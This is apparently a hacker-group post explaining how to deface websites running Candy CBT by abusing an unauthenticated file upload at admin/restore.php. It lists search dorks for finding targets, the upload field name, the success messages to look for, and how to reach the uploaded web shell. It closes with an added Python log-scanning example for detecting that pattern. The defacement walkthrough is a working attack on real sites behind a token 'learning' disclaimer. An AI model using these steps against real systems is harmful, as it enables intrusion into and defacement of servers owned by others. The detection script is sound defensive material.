How To Deface Candy CBT Arbitrary File Upload (AFU)

 



#Author : xLoveSyndrome'z 

#Team : Hacker Patah Hati

#dork : "Support By Candy CBT v2.8.0 r3"

               "Responsive By Image"

                inurl:cbt "login.php"

#exploit : admin/restore.php

#csrf : online CSRF tool, post file field: datafile

#proof Of Concept :

1. Find a target



2. Enter the exploit path:

   http://site.com/admin/restore.php

   Vulnerable? The page shows the text "Fatal Error".



3. Enter the target in an online CSRF tool; the post file field is datafile



4. Choose your shell; any extension is accepted

5. Shell uploaded successfully? The page shows the text "data berhasil di restore"



6. Access the shell? http://site.com/admin/shellkalian.php


Note : For learning purposes only!!!
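
A defender-side check for the pattern in steps 2 to 6, as an added example that is not part of the original post: it scans a web access log for POST requests to admin/restore.php and for scripts under /admin/ that are first requested only after such a POST. The combined log format, the sample lines, the function name and the script-extension list are assumptions.

```python
import re

# Constructed sample access-log lines (combined log format). Addresses are
# documentation ranges and file names are made up for this example.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /admin/index.php HTTP/1.1" 200 5120
203.0.113.9 - - [12/Mar/2024:10:04:10 +0000] "GET /admin/restore.php HTTP/1.1" 500 312
203.0.113.9 - - [12/Mar/2024:10:05:41 +0000] "POST /admin/restore.php HTTP/1.1" 200 640
203.0.113.9 - - [12/Mar/2024:10:06:03 +0000] "GET /admin/x1.php HTTP/1.1" 200 88
198.51.100.7 - - [12/Mar/2024:10:07:00 +0000] "GET /admin/index.php HTTP/1.1" 200 5120
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
RESTORE = "/admin/restore.php"               # endpoint named on the page
SCRIPT_EXT = (".php", ".phtml", ".phar")     # assumption: server-executed types


def find_restore_abuse(log_text):
    """Return alerts for uploads to restore.php and for scripts under /admin/
    that are requested for the first time only after such an upload."""
    alerts, seen_scripts, upload_seen = [], set(), False
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue                          # skip lines in another format
        ip, ts, method, url, status = m.groups()
        path = url.split("?", 1)[0].lower()
        if path.endswith(RESTORE):
            if method == "POST":              # a file was sent to the restore page
                upload_seen = True
                alerts.append(("restore_upload", ip, ts, path))
            continue
        if "/admin/" in path and path.endswith(SCRIPT_EXT):
            # A script nobody requested before the upload, now served with 200
            if upload_seen and path not in seen_scripts and status == "200":
                alerts.append(("new_script_after_upload", ip, ts, path))
            seen_scripts.add(path)
    return alerts


if __name__ == "__main__":
    for alert in find_restore_abuse(SAMPLE_LOG):
        print(alert)
```

Feed it the full log history in order, so that legitimate admin pages are already in the seen set before any upload appears.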